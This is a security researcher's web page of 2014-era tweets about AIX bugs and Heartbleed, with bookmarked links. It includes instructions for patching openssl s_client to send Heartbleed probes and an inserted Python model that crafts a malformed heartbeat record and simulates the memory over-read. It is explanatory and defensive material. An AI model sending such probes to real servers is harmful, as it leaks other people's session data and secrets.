www.machine.org.uk/meta:: Because shit does happen!


[*] timb_machine: $londonscalling ++; @self->gameface(); # #brentfordfc

[*] timb_machine: $debiansec = @self + @portcullislabs; # Thanks to @sqshr, our internal Debian pen testing repo has been restarted

[*] timb_machine: @hackerfantastic Threat to disclose prompts first meaningful updates. 1 vendor will be dropping quite a lot of patches in May/June.

[*] timb_machine: @dwordj I'm kicking puppies, AIX doesn't have SEH. I like the idea though.

[*] timb_machine: Program received signal SIGSEGV, Segmentation fault. 2: /x $r4 = 0x41414141 1: /x $r0 = 0x41414141 # Things that go bang in the night!

[*] timb_machine: @hackerfantastic, @mwrlabs, @metasploit For that particular bug I wouldn't even have bothered with the compiler.

[*] timb_machine: @hackerfantastic Lots more in the pipeline. /me pokes vendors.

[*] timb_machine: @hackerfantastic, @mwrlabs, @metasploit I don't actually think I've seen either outside of @portcullislabs TBH.

[*] timb_machine: @hackerfantastic, @mwrlabs, @metasploit I carry gdb and gcc with me for AIX.

[*] timb_machine: @hackerfantastic, @mwrlabs, @metasploit Almost never, but cc is just as infrequent due to licensing. Falls back to /bin/sh, no?

[*] timb_machine: @InfosecEditor Pretty sure we (@portcullis) could oblige :)

[*] timb_machine: @jduck Looks good, mine arrived yesterday and I had a quick skim.

[*] timb_machine: RT @jperkin libsunw_ssl, or, how SmartOS avoids sadness. Comprehensive as always from Keith. http://dtrace.org/blogs/wesolows/2014/04/10/libsunw_ssl-or-how-smartos-avoids-sadness/

[*] timb_machine: if (fork()) { while (1) { sploit(); } } else { raceme(); } # Yo, $vendor, when you patch bug, best not to make the patch racey :) # bugfix

[*] timb_machine: @nmonkee Boo, so who do we need to impress this year for an invite :)

[*] timb_machine: @mwrlabs, @metasploit The AIX local PoC on http://cxsecurity.com/issue/WLB-2014040024 could reference https://labs.portcullis.co.uk/blog/in-the-lab-popping-cve-2013-4011-for-aix-7-1/ (not my bug, just my analysis)

[*] timb_machine: RT @dcuthbert The amount of people based in the UK scanning for vuln SSL servers is staggering. Brave, very brave especially with the CMA

[*] timb_machine: @BSidesLondon What's Internet access likely to be like for workshops?

[*] timb_machine: @charlesarthur In the former case, most modern browsers have ASLR, leaking browser memory is a common way to work out "R" in that equation.

[*] timb_machine: @charlesarthur Depends. Could make exploiting another bug easier. Could leak sensitive information from users current session.

[*] timb_machine: @aallan If the browser is linked against a vulnerable version of OpenSSL it won't have any choice.

[*] timb_machine: @aallan, @charlesarthur As to whether a) the browser will honour it and b) whether the browser's heartbeat implementation is vulnerable...

[*] timb_machine: @aallan, @charlesarthur Yes, I wrote one of the first heartbleed PoC. Took me about 15 minutes to trigger in either direction.

[*] timb_machine: @charlesarthur And when I say web site, I mean the underlying web server, heartbeat functionality isn't trivially exposed to web app devs.

[*] timb_machine: @charlesarthur If the *phone* has a bad version of OpenSSL, then a malicious web site could send heartbeat request to leak browser data.

[*] timb_machine: @self->collapse(); # Re-taming the garden after the winter!

[*] timb_machine: @kalilinux That's not at all how it came across.

[*] timb_machine: @kalilinux Curious as to whether you can enforce... http://en.wikipedia.org/wiki/Trademark#Enforcing_rights suggests maybe not.

[*] timb_machine: $life = $beer + $kebab + $brentfordfc; # Weekend fun

[*] timb_machine: @attritionorg, We've already shut up for the night, but I saw that email sneak through. Yet again, better than SLA :)

[*] timb_machine: @attritionorg Do the @OSVDB moderators never sleep? :)

[*] timb_machine: @iseezeroday Hand delivering to the NCC SF office? Nice touch. @portcullis directors delivered advisory beers to our US office last month.

[*] timb_machine: @pwni, @j0hn__f Who uses ASA anyway these days? :P

[*] timb_machine: @garyoleary MMMM, document.cookies.

[*] timb_machine: @mwrlabs Be good to see you, @portcullislabs has 2, @gsuberland is doing a crypto talk and I'm doing mobile sec without mentioning Drozer :P

[*] timb_machine: @dcuthbert Haven't looked at CheckSec but I gather it offers some of the same features :P

[*] timb_machine: @garyoleary Which PoC are you using?

[*] timb_machine: @digininja Having a reporting engine is your friend.

[*] timb_machine: @dive_monkey Gandi, good enough that I haven't left in ~10 years.

[*] timb_machine: @hackerfantastic "goto apple;" :)

[*] timb_machine: @OSVDB Better than your SLA *again*.

[*] timb_machine: @thegrugq butbut the Internet said it was malloc()

[*] timb_machine: @OSVDB Ta :)

[*] timb_machine: @osvdb Portcullis Computer Security Ltd (2379) is the same as Portcullis CSL (1136), can someone fix the database :)

[*] timb_machine: @ericlaw This.

[*] timb_machine: @i0n1c Depends on your existing signal/noise ratio.

[*] timb_machine: @msuiche Agree about the constant usage. No wonder it has bugs.

[*] timb_machine: RT @gandibar Regenerate/replace our SSL certs for free. The old one will be auto revoked. Don't revoke unless you want to buy a new cert.

[*] timb_machine: $bugs ++; # I spy some public RPATH bugs :), kudos to @hpsecurity and boo to @bmcsoftware

[*] timb_machine: @McGrewSecurity .pl? ;)

[*] timb_machine: @Bugcrowd Mine, see 2-3 tweets back.

[*] timb_machine: @domchell Static content

[*] timb_machine: $patch ++; # The patch I wrote for openssl s_client to poke heartbleed: https://www.nth-dimension.org.uk/downloads.php?id=97

[*] s_client-vs-cve-2014-0160.diff.txt

[*] timb_machine: @mod0 Nice bug :)

[*] timb_machine: @domchell No non-public content to steal, but we've patched and will be replacing our certs.

[*] timb_machine: @singe, @jcran Change payload length, // the assert and change the length of the send (as alluded to here: http://www.reddit.com/r/netsec/comments/22gaar/heartbleed_attack_allows_for_stealing_server/cgmm7rt)

[*] timb_machine: @Gunther_AR http://www.reddit.com/r/netsec/comments/22gaar/heartbleed_attack_allows_for_stealing_server/cgmm7rt < short version

[*] timb_machine: @FredericJacobs, @ioerror 3 line patch.

[*] timb_machine: @ex509 Inclined to agree.

[*] timb_machine: @sqshr Butbut, you run Arch, surely you're running vulnerable code?

[*] timb_machine: @sqshr My PoC triggers differing behaviour on patched openssl-1.0.1g vs 1.0.1f. Almost certainly working. Took ~10 minutes to figure it out.

[*] timb_machine: $heartbleed ++ ; # Anybody got a confirmed patched server?

[*] timb_machine: $hacknight ++; # Spent the evening taking @eventilt and @etamotweet through some mobile app sec in prep for @BSidesLondon

[*] timb_machine: @wimremes Gentoo with a hardened profile.

[*] timb_machine: @__Freakyclown__, @n0x00, @nmonkee Well you know who is writing it?...

[*] timb_machine: @nickjhayes Hilarious. Hilarious.

[*] timb_machine: @nickjhayes Trollalolacoptor. Quiet web site man.

[*] timb_machine: @sqshr Very bad person, very very bad person.

[*] timb_machine: @nickjhayes, @sqshr return ENOSKILLS;

[*] timb_machine: @nickjhayes, @sqshr .NET or something else?

[*] timb_machine: @sqshr, @nickjhayes A very bad person.

[*] timb_machine: @0wasp On AIX, TCB/TE as appropriate. TACF will also do it on UNIXs more generally.

[*] timb_machine: @n0x00, @nmonkee Hah!

[*] timb_machine: @_larry0 Best of luck. I look forward to seeing more advisories in due course.

[*] timb_machine: @n0x00, @nmonkee Logos cost.

[*] timb_machine: @gsuberland You had a bug, I killed it, what's not to like. Okay, maybe I should have used SIGHUP...

[*] timb_machine: kill("KILL", @gsuberland); # BUGFIX

[*] timb_machine: @midnite_runr (speaking as a UNIX kernel geek)

[*] timb_machine: @midnite_runr Yeh. I just wouldn't consider that to be anything like how setuid binaries work.

[*] timb_machine: @schrotthaufen Doesn't that require either a reauth or an account that is already effectively Administrator?
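The heartbleed tweets above (the s_client patch, and the "change payload length, comment out the assert, change the length of the send" recipe) describe a length mismatch between the heartbeat header and the bytes actually sent. The following is an added example, written for this page and not code from the author or from OpenSSL: it builds such a TLS heartbeat record (RFC 6520 layout) and models both the pre-1.0.1g server path, which trusts the attacker-supplied payload_length, and the 1.0.1g path, which checks it against the record length. The "heap" bytes are constructed here to stand for whatever sits after the record buffer in process memory.

```python
"""Heartbleed (CVE-2014-0160): the missing length check, modelled in Python.

Added example, not from the page or from OpenSSL.  The TLS heartbeat
message (RFC 6520) is  type(1) || payload_length(2) || payload || padding.
The vulnerable path copies payload_length bytes from the payload pointer
without checking that they lie inside the received record.
"""
import struct

HB_REQUEST = 1
HB_RESPONSE = 2
PADDING_LEN = 16                     # RFC 6520: at least 16 bytes of padding
HEARTBEAT_CONTENT_TYPE = 24          # TLS ContentType for heartbeat

# Constructed stand-in for memory adjacent to the record buffer.
FAKE_HEAP = b"cookie=SESSION1234;" + b"\x00" * 100


def build_heartbeat(declared_len: int, payload: bytes) -> bytes:
    """declared_len goes into the header independently of len(payload);
    that mismatch is what the patched s_client in the tweets produces."""
    return struct.pack("!BH", HB_REQUEST, declared_len) + payload + b"\x00" * PADDING_LEN


def tls_record(body: bytes, version=(3, 2)) -> bytes:
    """Wrap a heartbeat body in a TLS record header (type, major, minor, length)."""
    return struct.pack("!BBBH", HEARTBEAT_CONTENT_TYPE, version[0], version[1], len(body)) + body


def _split_record(record: bytes):
    body_len = struct.unpack("!H", record[3:5])[0]
    return body_len, record[5:5 + body_len]


def vulnerable_server(record: bytes, heap: bytes = FAKE_HEAP) -> bytes:
    """Pre-1.0.1g behaviour: reads payload_length from the message and copies
    that many bytes starting at the payload, running past the record into
    adjacent memory (modelled by appending `heap`)."""
    _, body = _split_record(record)
    hbtype, payload_len = struct.unpack("!BH", body[:3])
    if hbtype != HB_REQUEST:
        return b""
    src = body[3:] + heap            # over-read: payload is shorter than payload_len
    leaked = src[:payload_len]
    return struct.pack("!BH", HB_RESPONSE, payload_len) + leaked + b"\x00" * PADDING_LEN


def patched_server(record: bytes, heap: bytes = FAKE_HEAP) -> bytes:
    """1.0.1g behaviour: silently discard a heartbeat whose header, declared
    payload and minimum padding do not fit in the received record."""
    body_len, body = _split_record(record)
    if body_len < 1 + 2 + PADDING_LEN:
        return b""                    # too short to even hold a header + padding
    hbtype, payload_len = struct.unpack("!BH", body[:3])
    if 1 + 2 + payload_len + PADDING_LEN > body_len:
        return b""                    # RFC 6520: discard, do not respond
    if hbtype != HB_REQUEST:
        return b""
    return struct.pack("!BH", HB_RESPONSE, payload_len) + body[3:3 + payload_len] + b"\x00" * PADDING_LEN


def response_payload(resp: bytes) -> bytes:
    """Extract the payload bytes a heartbeat response carries (empty if none)."""
    if not resp:
        return b""
    n = struct.unpack("!H", resp[1:3])[0]
    return resp[3:3 + n]


if __name__ == "__main__":
    evil = tls_record(build_heartbeat(64, b"hi"))      # claims 64, sends 2
    print("vulnerable leaks:", response_payload(vulnerable_server(evil)))
    print("patched returns :", patched_server(evil))
```

Against the vulnerable model the 64-byte response carries the two real payload bytes, the padding, and then the constructed "heap" contents; the patched model returns nothing at all for the same record, while an honest heartbeat whose declared length matches its payload is answered by both. That differing behaviour between 1.0.1f and 1.0.1g is the signal the tweets use to tell a patched server from an unpatched one.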

[*] NDSA20140311.txt.asc

[*] SAP Transaction Codes

[*] Patch to x3270 to make it ignore protected fields, and allow them to be modified. This provided some significant pwnage on an assessment where the mainframe (IMS) application appeared to pass the username from one field to another. I'm still researching

[*] security - Exploitable PHP functions - Stack Overflow

[*] Retargetable Decompiler

[*] Rechenzentrum Kreuznach - die AS/400-Profis

[*] Configuration of hidden Sendmail SSL/TLS connection options « TriathlonMike

[*] Native Extensions for Perl without Smoke and Mirrors

[*] Deconstructing the Azure Point-to-Site VPN for Command Line usage - Diary Of A Ninja

[*] Volatile Minds

[*] Cryptographic flaws in Oracle Database authentication protocol | Marcel's Blog

[*] OpenPGP Best Practices - Privacy and Authenticity Ou... - Riseup Labs - Groups - we.riseup.net

[*] HOWTO: Linux NAT in Four Steps using iptables

[*] Project Ouroboros — Reflashing a betemcu USBasp Programmer | Jonathan Thomson's web journal

[*] A brief look at the Acer ChromeBook #2

[*] A brief look at the Acer ChromeBook #1

[*] Dead bugs society

[*] A brief look at the RIM PlayBook

[*] Breaking cpau, a dummies guide

[*] Bypassing the Android pattern lock

[*] Introducing VulnApp

[*] Exploiting the Linux linker

[*] Dumping Samba hashes

[*] Defcon 18 CTF qualifiers: who is the h4x13st h4x0r of them all

© www.machine.org.uk Web Master, 2006